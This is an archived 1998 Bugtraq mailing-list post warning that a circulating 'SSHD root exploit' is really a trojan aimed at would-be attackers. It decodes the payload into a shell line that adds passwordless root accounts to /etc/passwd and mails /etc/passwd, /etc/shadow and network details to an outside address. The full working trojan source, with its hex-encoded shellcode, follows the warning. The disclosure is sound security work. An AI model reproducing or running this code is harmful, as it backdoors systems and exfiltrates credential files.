[8567] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Administrivia

daemon@ATHENA.MIT.EDU (Chris Tobkin)
Mon Nov 16 12:34:39 1998

Date: 	Sun, 15 Nov 1998 02:31:58 -0600
Reply-To: Chris Tobkin <tobkin@JAWS.UMN.EDU>
From: Chris Tobkin <tobkin@JAWS.UMN.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.SUN.4.01.9811141854050.4493-100000@dfw.nationwide.net> from
              "Aleph One" at Nov 14, 98 07:03:31 pm

Speaking of trojans/lame scripts, there is a 'root exploit for Linux 2.0.* and
possibly 2.1.* SSHD 1.5-1.2.23' going around on some of the efnet channels..
It is actually a spiffed up c script that does:

 echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd /etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com
 /bin/sh

If one were to just print out the shellcode this would be immediately obvious.
(i.e. printf("<insert shellcode here>");  pipe it through strings to get rid of
the control characters..)

The filenames that it is been being passed around as are "sshdexp.c" and the
"sshdwarez.c" which was already referenced on bugtraq...  other people can rip
this one to shreds with the fetch() which is cute..  and the system("/bin/echo")
instead of printf("").  This is, however, a good way to get rid of scriptkiddies
that don't know how to write code but want all the benefits of everyone elses's
intelligence..

Caveat emptor, again.

// chris
tobkin@umn.edu

*************************************************************************
Chris Tobkin                                               tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
 -----------------------------------------------------------------------
  "Thanks to the printing press, the deviant smart people were able to
    distribute their genius without having to pass it on genetically.
         Evolution was short-circuited.  We gained knowlege and
        technology without gaining intelligence." - Scott Addams
*************************************************************************

-- sshdtrojan.c --

/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23      */
/* On some weird systems this causes a segfault                         */
/* If it doesnt work change the offset (usually between 0 and 5000)     */
/*                                     (try increments of 2.......)     */
/* TO RUN:                                                              */
/* (./sshdwarez ; cat) | nc victim 22                                   */
/*                                                                      */
/*              forever yours: st4n@zdnetmail.com                       */
/************************************************************************/

#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define OFFSET  146
#define NOP     0x90

char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int fetch(int *w){      /* push and return something from the stack */
        char stack[4096];
        int (*push)();
        memcpy((int*)&push,w,sizeof(int));
        memcpy(stack,(char*)w+4,OFFSET-5);
        push(stack);
        return *w;
}

int i;
char *p;
main(int argc,char**argv)
{
        char s[1024];
        char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
        strcpy(argv[0],"vi          ");

        if (getuid())
        {
                system("/bin/echo this program uses priveledged ports. "
                       "run as root.");
                return -1;
        }
        write(1,ssh,sizeof(ssh));
        for (i=0;i<500;i++)
                s[i]=NOP;
        p=&s[i];
        memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
        /* most [linux] systems keep libc functions in the same place */
        i=(int)system;memcpy(&shellcode,&i,sizeof(int));
        write(1,s,500+(sizeof(shellcode)-OFFSET));
        fetch((int*)&shellcode);
        usleep(1000000);
        return 0;
}

home help back first fref pref prev next nref lref last post